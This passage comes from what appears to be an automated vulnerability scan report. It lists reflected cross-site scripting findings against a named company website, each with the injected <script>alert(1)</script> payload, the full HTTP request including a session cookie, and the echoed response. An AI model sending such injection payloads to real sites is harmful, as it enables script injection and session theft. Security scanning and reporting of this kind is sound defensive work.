Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.livequery.jscad07"><script>alert(1)</script>6ede187ab0a?1265536927" />
...[SNIP]...

1.102. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.livequery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 905ba<script>alert(1)</script>3f55e04fe11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.livequery.js905ba<script>alert(1)</script>3f55e04fe11?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.livequery.js905ba<script>alert(1)</script>3f55e04fe11?1265536927</h2>
...[SNIP]...

1.103. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery1.6.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 215b7<script>alert(1)</script>322b7e3b7ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js215b7<script>alert(1)</script>322b7e3b7ea/jquery1.6.js?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js215b7<script>alert(1)</script>322b7e3b7ea/jquery1.6.js?1305629942</h2>
...[SNIP]...

1.104. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery1.6.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e8f"><script>alert(1)</script>a29490a2495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js90e8f"><script>alert(1)</script>a29490a2495/jquery1.6.js?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js90e8f"><script>alert(1)</script>a29490a2495/jquery1.6.js?1305629942" />
...[SNIP]...

1.105. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery1.6.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3103"><script>alert(1)</script>f5caea96825 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery1.6.jsf3103"><script>alert(1)</script>f5caea96825?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery1.6.jsf3103"><script>alert(1)</script>f5caea96825?1305629942" />
...[SNIP]...

1.106. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery1.6.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 215dc<script>alert(1)</script>95af8fd7b4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery1.6.js215dc<script>alert(1)</script>95af8fd7b4f?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery1.6.js215dc<script>alert(1)</script>95af8fd7b4f?1305629942</h2>
...[SNIP]...

1.107. http://www.sourcebits.com/js/main.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/main.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68dee<script>alert(1)</script>55daecef101 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js68dee<script>alert(1)</script>55daecef101/main.js?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js68dee<script>alert(1)</script>55daecef101/main.js?1297925994</h2>
...[SNIP]...

1.108. http://www.sourcebits.com/js/main.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/main.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a93f7"><script>alert(1)</script>378708f50e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa93f7"><script>alert(1)</script>378708f50e9/main.js?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsa93f7"><script>alert(1)</script>378708f50e9/main.js?1297925994" />
...[SNIP]...

1.109. http://www.sourcebits.com/js/main.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/main.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f11b<script>alert(1)</script>0118837862c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/main.js8f11b<script>alert(1)</script>0118837862c?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:49:05 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/main.js8f11b<script>alert(1)</script>0118837862c?1297925994</h2>
...[SNIP]...

1.110. http://www.sourcebits.com/js/main.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/main.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c9b"><script>alert(1)</script>a5351d0cd79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/main.js74c9b"><script>alert(1)</script>a5351d0cd79?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:58 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/main.js74c9b"><script>alert(1)</script>a5351d0cd79?1297925994" />
...[SNIP]...

1.111. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5af8<script>alert(1)</script>acf6a23c6f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa5af8<script>alert(1)</script>acf6a23c6f1/modernizr-1.7.min.js?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsa5af8<script>alert(1)</script>acf6a23c6f1/modernizr-1.7.min.js?1305313043</h2>
...[SNIP]...

1.112. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d594"><script>alert(1)</script>b327dcd3bcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js5d594"><script>alert(1)</script>b327dcd3bcd/modernizr-1.7.min.js?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js5d594"><script>alert(1)</script>b327dcd3bcd/modernizr-1.7.min.js?1305313043" />
...[SNIP]...

1.113. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4d9"><script>alert(1)</script>67cda7b89b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/modernizr-1.7.min.js2b4d9"><script>alert(1)</script>67cda7b89b2?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/modernizr-1.7.min.js2b4d9"><script>alert(1)</script>67cda7b89b2?1305313043" />
...[SNIP]...

1.114. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10e6e<script>alert(1)</script>40524db9a4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/modernizr-1.7.min.js10e6e<script>alert(1)</script>40524db9a4a?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/modernizr-1.7.min.js10e6e<script>alert(1)</script>40524db9a4a?1305313043</h2>
...[SNIP]...

1.115. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/sb_announce.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d459d"><script>alert(1)</script>aa35a7146b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd459d"><script>alert(1)</script>aa35a7146b7/sb_announce.js?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsd459d"><script>alert(1)</script>aa35a7146b7/sb_announce.js?1305558390" />
...[SNIP]...

1.116. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/sb_announce.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1a8b<script>alert(1)</script>d1681c560bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsb1a8b<script>alert(1)</script>d1681c560bc/sb_announce.js?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsb1a8b<script>alert(1)</script>d1681c560bc/sb_announce.js?1305558390</h2>
...[SNIP]...

1.117. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/sb_announce.js

Issue detail

